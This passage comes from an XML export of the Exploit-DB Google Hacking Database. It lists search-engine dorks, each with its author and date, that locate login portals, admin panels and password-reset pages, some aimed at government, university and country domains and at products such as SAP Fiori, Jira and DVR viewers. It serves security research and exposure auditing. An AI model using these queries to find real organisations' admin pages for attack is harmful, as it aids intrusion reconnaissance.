<query>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</query>
<querystring>https://www.google.com/search?q=Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Ishak Hasan Sabbir</author>
</entry>
<entry>
<id>8201</id>
<link>https://www.exploit-db.com/ghdb/8201</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;
# Pages Containing Login Portals
# Date:31/05/2023
# Exploit Author: Ishak Hasan Sabbir</textualDescription>
<query>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</query>
<querystring>https://www.google.com/search?q=Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Ishak Hasan Sabbir</author>
</entry>
<entry>
<id>5619</id>
<link>https://www.exploit-db.com/ghdb/5619</link>
<category>Pages Containing Login Portals</category>
<shortDescription>redash inurl:/org_slug</shortDescription>
<textualDescription>Redash Dashboard logins
# Google Dork: redash inurl:/org_slug
# Date: [4-11-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>redash inurl:/org_slug</query>
<querystring>https://www.google.com/search?q=redash inurl:/org_slug</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>7941</id>
<link>https://www.exploit-db.com/ghdb/7941</link>
<category>Pages Containing Login Portals</category>
<shortDescription>sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com</shortDescription>
<textualDescription># Google Dork: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com
# Pages Containing Login Portals
# Date: 18/06/2022
# Exploit Author: Pablo Salinas</textualDescription>
<query>sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com</query>
<querystring>https://www.google.com/search?q=sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Pablo Salinas</author>
</entry>
<entry>
<id>3850</id>
<link>https://www.exploit-db.com/ghdb/3850</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.</shortDescription>
<textualDescription># Category: FTP Login Portals
# Description : Dork for finding FTP Login portals
# Google Dork: Serv-U <20> Copyright 1995-2013 Rhino Software, Inc. All
Rights.Reserved.
# Date: 16/04/2013
# Exploit Author: Arul Kumar.V
# Vendor Homepage: www.serv-u.com
# Email : hackerarul@gmail.com
Thank you</textualDescription>
<query>Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.</query>
<querystring>https://www.google.com/search?q=Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>8253</id>
<link>https://www.exploit-db.com/ghdb/8253</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Shopping Website Login Pages</shortDescription>
<textualDescription># Google Dork: Shopping Website Login Pages
# Pages Containing Login Portals
# Date: 13/10/2023
# Exploit Prathamesh Kamble</textualDescription>
<query>Shopping Website Login Pages</query>
<querystring>https://www.google.com/search?q=Shopping Website Login Pages</querystring>
<edb></edb>
<date>2023-10-13</date>
<author>Prathamesh Kamble</author>
</entry>
<entry>
<id>4059</id>
<link>https://www.exploit-db.com/ghdb/4059</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site: edu|org + inurl:&quot;faculty_login.asp | .php&quot;</shortDescription>
<textualDescription>Type: login portals
Author : botsec0</textualDescription>
<query>site: edu|org + inurl:&quot;faculty_login.asp | .php&quot;</query>
<querystring>https://www.google.com/search?q=site: edu|org + inurl:&quot;faculty_login.asp | .php&quot;</querystring>
<edb></edb>
<date>2015-08-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7423</id>
<link>https://www.exploit-db.com/ghdb/7423</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;*.com&quot; inurl: admin/index.php</shortDescription>
<textualDescription># Google Dork: site:&quot;*.com&quot; inurl: admin/index.php
# Pages Containing Login Portals
# Date:09/10/2021
# Exploit Author: adreeta maity</textualDescription>
<query>site:&quot;*.com&quot; inurl: admin/index.php</query>
<querystring>https://www.google.com/search?q=site:&quot;*.com&quot; inurl: admin/index.php</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>adreeta maity</author>
</entry>
<entry>
<id>7167</id>
<link>https://www.exploit-db.com/ghdb/7167</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;.ae&quot; intitle:&quot;admin login&quot;</shortDescription>
<textualDescription># Google Dork: site:&quot;.ae&quot; intitle:&quot;admin login&quot;
# Pages Containing Login Portals
# Date: 02/09/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>site:&quot;.ae&quot; intitle:&quot;admin login&quot;</query>
<querystring>https://www.google.com/search?q=site:&quot;.ae&quot; intitle:&quot;admin login&quot;</querystring>
<edb></edb>
<date>2021-09-08</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7168</id>
<link>https://www.exploit-db.com/ghdb/7168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;.au&quot; intitle:&quot;admin login&quot;</shortDescription>
<textualDescription># Google Dork: site:&quot;.au&quot; intitle:&quot;admin login&quot;
# Pages Containing Login Portals
# Date: 02/09/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>site:&quot;.au&quot; intitle:&quot;admin login&quot;</query>
<querystring>https://www.google.com/search?q=site:&quot;.au&quot; intitle:&quot;admin login&quot;</querystring>
<edb></edb>
<date>2021-09-08</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7161</id>
<link>https://www.exploit-db.com/ghdb/7161</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;.edu&quot; intitle:&quot;admin login&quot;</shortDescription>
<textualDescription># Google Dork: site:&quot;.edu&quot; intitle:&quot;admin login&quot;
# Pages Containing Login Portals
# Date: 02/09/2021
# Exploit Author: Sahil Gupta
</textualDescription>
<query>site:&quot;.edu&quot; intitle:&quot;admin login&quot;</query>
<querystring>https://www.google.com/search?q=site:&quot;.edu&quot; intitle:&quot;admin login&quot;</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7225</id>
<link>https://www.exploit-db.com/ghdb/7225</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;.om&quot; intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:&quot;.om&quot; intitle:&quot;login&quot;
# Pages Containing Login Portals
# Date: 14/09/2021
# Exploit Author: Saiju Pillai</textualDescription>
<query>site:&quot;.om&quot; intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:&quot;.om&quot; intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>7165</id>
<link>https://www.exploit-db.com/ghdb/7165</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:&quot;.uk&quot; intitle:&quot;admin login&quot;</shortDescription>
<textualDescription># Google Dork: site:&quot;.uk&quot; intitle:&quot;admin login&quot;
# Pages Containing Login Portals
# Date: 02/08/2021
# Exploit Author: Sahil Gupta </textualDescription>
<query>site:&quot;.uk&quot; intitle:&quot;admin login&quot;</query>
<querystring>https://www.google.com/search?q=site:&quot;.uk&quot; intitle:&quot;admin login&quot;</querystring>
<edb></edb>
<date>2021-09-07</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>5538</id>
<link>https://www.exploit-db.com/ghdb/5538</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:* intitle:&quot;reset password&quot;</shortDescription>
<textualDescription>*DORK: *site:* intitle:&quot;reset password&quot;
*AUTHOR: Paras Arora(PAC Security)*
*DATE: 17 September 2019*
*Category: reset password portals*
</textualDescription>
<query>site:* intitle:&quot;reset password&quot;</query>
<querystring>https://www.google.com/search?q=site:* intitle:&quot;reset password&quot;</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>5440</id>
<link>https://www.exploit-db.com/ghdb/5440</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.*.*/authentication/Logon</shortDescription>
<textualDescription>Login Pages:
site:*.*.*/authentication/Logon
site:*.*.*/authentication intitle:&quot;sign in&quot;
site:authentication.*.*/login
Reza Abasi
</textualDescription>
<query>site:*.*.*/authentication/Logon</query>
<querystring>https://www.google.com/search?q=site:*.*.*/authentication/Logon</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6804</id>
<link>https://www.exploit-db.com/ghdb/6804</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.com inurl:axis2-admin</shortDescription>
<textualDescription>Dork: site:*.com inurl:axis2-admin
</textualDescription>
<query>site:*.com inurl:axis2-admin</query>
<querystring>https://www.google.com/search?q=site:*.com inurl:axis2-admin</querystring>
<edb></edb>
<date>2021-02-23</date>
<author>Axel Meneses</author>
</entry>
<entry>
<id>7600</id>
<link>https://www.exploit-db.com/ghdb/7600</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.example.com inurl:/carbon/admin/login.jsp</shortDescription>
<textualDescription># Google Dork: site:*.example.com inurl:/carbon/admin/login.jsp
# Category: Pages Containing Login Portals
# Date: 05/11/2021
# Author: Girish
</textualDescription>
<query>inurl:/carbon/admin/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/carbon/admin/login.jsp</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Girish</author>
</entry>
<entry>
<id>7794</id>
<link>https://www.exploit-db.com/ghdb/7794</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.gov.au inurl:wp-admin</shortDescription>
<textualDescription># Google Dork: site:*.gov.au inurl:wp-admin
# Pages Containing Login Portals
# Date: 13/11/2021
# Exploit Author: Haox Hapot</textualDescription>
<query>site:*.gov.au inurl:wp-admin</query>
<querystring>https://www.google.com/search?q=site:*.gov.au inurl:wp-admin</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Haox Hapot</author>
</entry>
<entry>
<id>7698</id>
<link>https://www.exploit-db.com/ghdb/7698</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.gov.in inurl:login.jsp</shortDescription>
<textualDescription># Google Dork: site:*.gov.in inurl:login.jsp
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>site:*.gov.in inurl:login.jsp</query>
<querystring>https://www.google.com/search?q=site:*.gov.in inurl:login.jsp</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>6823</id>
<link>https://www.exploit-db.com/ghdb/6823</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.herokuapp.com intitle:login</shortDescription>
<textualDescription># Dork: site:*.herokuapp.com intitle:login</textualDescription>
<query>site:*.herokuapp.com intitle:login</query>
<querystring>https://www.google.com/search?q=site:*.herokuapp.com intitle:login</querystring>
<edb></edb>
<date>2021-03-05</date>
<author>higormelga</author>
</entry>
<entry>
<id>7692</id>
<link>https://www.exploit-db.com/ghdb/7692</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.in inurl: admin login</shortDescription>
<textualDescription># Google Dork: site:*.in inurl: admin login
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Ritika Keni</textualDescription>
<query>site:*.in inurl: admin login</query>
<querystring>https://www.google.com/search?q=site:*.in inurl: admin login</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Ritika Keni</author>
</entry>
<entry>
<id>7793</id>
<link>https://www.exploit-db.com/ghdb/7793</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.in inurl:jira login</shortDescription>
<textualDescription># Google Dork: site:*.in inurl:jira login
# Pages Containing Login Portals
# Date:13/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:*.in inurl:jira login</query>
<querystring>https://www.google.com/search?q=site:*.in inurl:jira login</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7023</id>
<link>https://www.exploit-db.com/ghdb/7023</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*.zendesk.com/auth/v2/login/registration</shortDescription>
<textualDescription># Google Dork: site:*.zendesk.com/auth/v2/login/registration
# Pages Containing Login Portals
# Exploit Author: Ritesh Gohil</textualDescription>
<query>site:*.zendesk.com/auth/v2/login/registration</query>
<querystring>https://www.google.com/search?q=site:*.zendesk.com/auth/v2/login/registration</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>Ritesh Gohil</author>
</entry>
<entry>
<id>5852</id>
<link>https://www.exploit-db.com/ghdb/5852</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/*/pwdrecovery.php</shortDescription>
<textualDescription>Login PORTAL:
site:*/*/pwdrecovery.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/*/pwdrecovery.php</query>
<querystring>https://www.google.com/search?q=site:*/*/pwdrecovery.php</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5356</id>
<link>https://www.exploit-db.com/ghdb/5356</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/access/unauthenticated</shortDescription>
<textualDescription>login portal
site:*/access/unauthenticated
site:*/access/logon/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/access/unauthenticated</query>
<querystring>https://www.google.com/search?q=site:*/access/unauthenticated</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5838</id>
<link>https://www.exploit-db.com/ghdb/5838</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account-recovery.html</shortDescription>
<textualDescription>Login Portal:
site:*/account-recovery.html
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account-recovery.html</query>
<querystring>https://www.google.com/search?q=site:*/account-recovery.html</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5451</id>
<link>https://www.exploit-db.com/ghdb/5451</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account-sign-in</shortDescription>
<textualDescription>Login Portal:
site:*/account-sign-in
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account-sign-in</query>
<querystring>https://www.google.com/search?q=site:*/account-sign-in</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5348</id>
<link>https://www.exploit-db.com/ghdb/5348</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account/login</shortDescription>
<textualDescription>login portal
site:*/account/login
inurl:/account/login
site:login.*.*/account/login
site:*/account/auth/
site:*/account/recovery/
site:*/account/recover/
site:*/account/forget-pass/
site:*/account/forget/
site:*/account/userlogin/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account/login</query>
<querystring>https://www.google.com/search?q=site:*/account/login</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5602</id>
<link>https://www.exploit-db.com/ghdb/5602</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account/lost_password</shortDescription>
<textualDescription>Login Portal:
site:*/account/lost_password
site:*/account/forgot-password
site:*/account/request-password-reset
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account/lost_password</query>
<querystring>https://www.google.com/search?q=site:*/account/lost_password</querystring>
<edb></edb>
<date>2019-10-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5563</id>
<link>https://www.exploit-db.com/ghdb/5563</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account/preferences</shortDescription>
<textualDescription>Login Portal:
site:*/account/preferences
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account/preferences</query>
<querystring>https://www.google.com/search?q=site:*/account/preferences</querystring>
<edb></edb>
<date>2019-10-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5628</id>
<link>https://www.exploit-db.com/ghdb/5628</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/account/reset</shortDescription>
<textualDescription>Login Portal:
site:*/account/reset
site:*/auth/forgot_password
site:*/account/resetpassword
site:*/accountrecoveryendpoint/recoverypassword.do
Reza Abasi(Turku)
</textualDescription>
<query>site:*/account/reset</query>
<querystring>https://www.google.com/search?q=site:*/account/reset</querystring>
<edb></edb>
<date>2019-11-07</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5854</id>
<link>https://www.exploit-db.com/ghdb/5854</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/adfs/ls/ intitle:&quot;Sign In&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/adfs/ls/ intitle:&quot;Sign In&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/adfs/ls/ intitle:&quot;Sign In&quot;</query>
<querystring>https://www.google.com/search?q=site:*/adfs/ls/ intitle:&quot;Sign In&quot;</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5391</id>
<link>https://www.exploit-db.com/ghdb/5391</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin-login intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription>Login page :
site:*/admin-login intitle:&quot;Admin Login&quot;
inurl:&quot;/admin-login?view=reset&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/admin-login intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/admin-login intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7257</id>
<link>https://www.exploit-db.com/ghdb/7257</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin.php inurl:admin</shortDescription>
<textualDescription># Google Dork: site:*/admin.php inurl:admin
# Pages Containing Login Portals
# Date:17/09/2021
# Exploit Author: Sonu Chaudhary</textualDescription>
<query>site:*/admin.php inurl:admin</query>
<querystring>https://www.google.com/search?q=site:*/admin.php inurl:admin</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Sonu Chaudhary</author>
</entry>
<entry>
<id>7154</id>
<link>https://www.exploit-db.com/ghdb/7154</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin.php inurl:files</shortDescription>
<textualDescription># Google Dork: site:*/admin.php inurl:files
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: Romell Marin Cordoba
</textualDescription>
<query>site:*/admin.php inurl:files</query>
<querystring>https://www.google.com/search?q=site:*/admin.php inurl:files</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>5386</id>
<link>https://www.exploit-db.com/ghdb/5386</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin/login.html</shortDescription>
<textualDescription>Login page :
site:*/admin/login.html
site:*/admin/Admin-Login.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/admin/login.html</query>
<querystring>https://www.google.com/search?q=site:*/admin/login.html</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5874</id>
<link>https://www.exploit-db.com/ghdb/5874</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin/password.php</shortDescription>
<textualDescription># Google Dork: site:*/admin/password.php
#Date: 31/03/2020
#Author: ASHIK KUNJUMON
</textualDescription>
<query>site:*/admin/password.php</query>
<querystring>https://www.google.com/search?q=site:*/admin/password.php</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>ASHIK KUNJUMON</author>
</entry>
<entry>
<id>5633</id>
<link>https://www.exploit-db.com/ghdb/5633</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admin/password/reset</shortDescription>
<textualDescription>Login POrtal:
site:*/admin/password/reset
site:*/admin/password-recovery/
site:*/password_reset/new
inurl:&quot;/pages/reset_password.php&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/admin/password/reset</query>
<querystring>https://www.google.com/search?q=site:*/admin/password/reset</querystring>
<edb></edb>
<date>2019-11-08</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5461</id>
<link>https://www.exploit-db.com/ghdb/5461</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/admincp/ intitle:&quot;Admin Cp&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/admincp/ intitle:&quot;Admin Cp&quot;
site:*/admincp/login.php
site:*/UserCP intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/admincp/ intitle:&quot;Admin Cp&quot;</query>
<querystring>https://www.google.com/search?q=site:*/admincp/ intitle:&quot;Admin Cp&quot;</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8066</id>
<link>https://www.exploit-db.com/ghdb/8066</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/AdminLogin.aspx</shortDescription>
<textualDescription># Google Dork: site:*/AdminLogin.aspx
# Pages Containing Login Portals
# Date:15/02/2023
# Exploit Author: Reza Abasi</textualDescription>
<query>site:*/AdminLogin.aspx</query>
<querystring>https://www.google.com/search?q=site:*/AdminLogin.aspx</querystring>
<edb></edb>
<date>2023-02-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5396</id>
<link>https://www.exploit-db.com/ghdb/5396</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/adminLogin/login/</shortDescription>
<textualDescription>Login page :
site:*/adminLogin/login/
site:*/Login/adminLogin
site:*/adminlogin.*
inurl:/adminlogin
Reza Abasi(Turku)
</textualDescription>
<query>site:*/adminLogin/login/</query>
<querystring>https://www.google.com/search?q=site:*/adminLogin/login/</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5824</id>
<link>https://www.exploit-db.com/ghdb/5824</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/AdminPanel.aspx</shortDescription>
<textualDescription># Google Dork: site:*/AdminPanel.aspx
# This dork found Admin Panels.
# Date: 20/03/2020
# Exploit Author: Emre DURMAZ
</textualDescription>
<query>site:*/AdminPanel.aspx</query>
<querystring>https://www.google.com/search?q=site:*/AdminPanel.aspx</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Emre DURMAZ</author>
</entry>
<entry>
<id>5697</id>
<link>https://www.exploit-db.com/ghdb/5697</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/AdminPanel.php</shortDescription>
<textualDescription>Login Portal:
site:*/AdminPanel.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/AdminPanel.php</query>
<querystring>https://www.google.com/search?q=site:*/AdminPanel.php</querystring>
<edb></edb>
<date>2020-01-23</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6044</id>
<link>https://www.exploit-db.com/ghdb/6044</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/asana/login</shortDescription>
<textualDescription>Find the Asana login panel using
DORK: site:*/asana/login
~ Irshad Ahamed
</textualDescription>
<query>site:*/asana/login</query>
<querystring>https://www.google.com/search?q=site:*/asana/login</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>5317</id>
<link>https://www.exploit-db.com/ghdb/5317</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth intitle:login</shortDescription>
<textualDescription>Finding login page of sites
site:*/auth intitle:login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/auth intitle:login</query>
<querystring>https://www.google.com/search?q=site:*/auth intitle:login</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6213</id>
<link>https://www.exploit-db.com/ghdb/6213</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth.html intitle:login</shortDescription>
<textualDescription># Google Dork site:*/auth.html intitle:login
# Description:- This dork is used to get the login portals of the websites.
# Author: Agrah Jain
# Date: 30-May-2020
# Linkedin: https://www.linkedin.com/in/agrahjain
</textualDescription>
<query>site:*/auth.html intitle:login</query>
<querystring>https://www.google.com/search?q=site:*/auth.html intitle:login</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Agrah Jain</author>
</entry>
<entry>
<id>5889</id>
<link>https://www.exploit-db.com/ghdb/5889</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth.php</shortDescription>
<textualDescription>Login Portal:
site:*/auth.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/auth.php</query>
<querystring>https://www.google.com/search?q=site:*/auth.php</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6089</id>
<link>https://www.exploit-db.com/ghdb/6089</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth/forgot</shortDescription>
<textualDescription>Login portals:
site:*/auth/forgot
site:*/auth/password
site:*/auth/login intitle:&quot;sign in&quot;
site:*/auth/password/request
site:*/auth/restore
Reza Abasi(Turku)
</textualDescription>
<query>site:*/auth/forgot</query>
<querystring>https://www.google.com/search?q=site:*/auth/forgot</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5363</id>
<link>https://www.exploit-db.com/ghdb/5363</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth/login.aspx</shortDescription>
<textualDescription>login portal
site:*/auth/login.aspx
Reza Abasi(Turku)
</textualDescription>
<query>site:*/auth/login.aspx</query>
<querystring>https://www.google.com/search?q=site:*/auth/login.aspx</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5472</id>
<link>https://www.exploit-db.com/ghdb/5472</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/authlogin/ intitle:login</shortDescription>
<textualDescription>Login Portal:
site:*/authlogin/ intitle:login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/authlogin/ intitle:login</query>
<querystring>https://www.google.com/search?q=site:*/authlogin/ intitle:login</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5519</id>
<link>https://www.exploit-db.com/ghdb/5519</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/authUpdate intitle:&quot;Account Access Help&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/authUpdate intitle:&quot;Account Access Help&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/authUpdate intitle:&quot;Account Access Help&quot;</query>
<querystring>https://www.google.com/search?q=site:*/authUpdate intitle:&quot;Account Access Help&quot;</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5532</id>
<link>https://www.exploit-db.com/ghdb/5532</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/authzssl/forget_password</shortDescription>
<textualDescription>Login Portal:
site:*/authzssl/forget_password
Reza Abasi(Turku)
</textualDescription>
<query>site:*/authzssl/forget_password</query>
<querystring>https://www.google.com/search?q=site:*/authzssl/forget_password</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5631</id>
<link>https://www.exploit-db.com/ghdb/5631</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/auth_index.htm?lang=kr&amp;loginvalue=0&amp;port=0</shortDescription>
<textualDescription>Samsung DVR web viewer login portal:
site:*/auth_index.htm?lang=kr&amp;loginvalue=0&amp;port=0
Reza Abasi(Turku)
</textualDescription>
<query>site:*/auth_index.htm?lang=kr&amp;loginvalue=0&amp;port=0</query>
<querystring>https://www.google.com/search?q=site:*/auth_index.htm?lang=kr&amp;loginvalue=0&amp;port=0</querystring>
<edb></edb>
<date>2019-11-08</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5531</id>
<link>https://www.exploit-db.com/ghdb/5531</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/casAuthn/login.php</shortDescription>
<textualDescription>Login Page:
site:*/casAuthn/login.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/casAuthn/login.php</query>
<querystring>https://www.google.com/search?q=site:*/casAuthn/login.php</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5612</id>
<link>https://www.exploit-db.com/ghdb/5612</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/cb-forgot-login</shortDescription>
<textualDescription>Login POrtal:
site:*/cb-forgot-login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cb-forgot-login</query>
<querystring>https://www.google.com/search?q=site:*/cb-forgot-login</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5364</id>
<link>https://www.exploit-db.com/ghdb/5364</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/cgi-bin/login.html</shortDescription>
<textualDescription>Online devices
site:*/cgi-bin/login.html
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi-bin/login.html</query>
<querystring>https://www.google.com/search?q=site:*/cgi-bin/login.html</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5630</id>
<link>https://www.exploit-db.com/ghdb/5630</link>
<category>Pages Containing Login Portals</category>
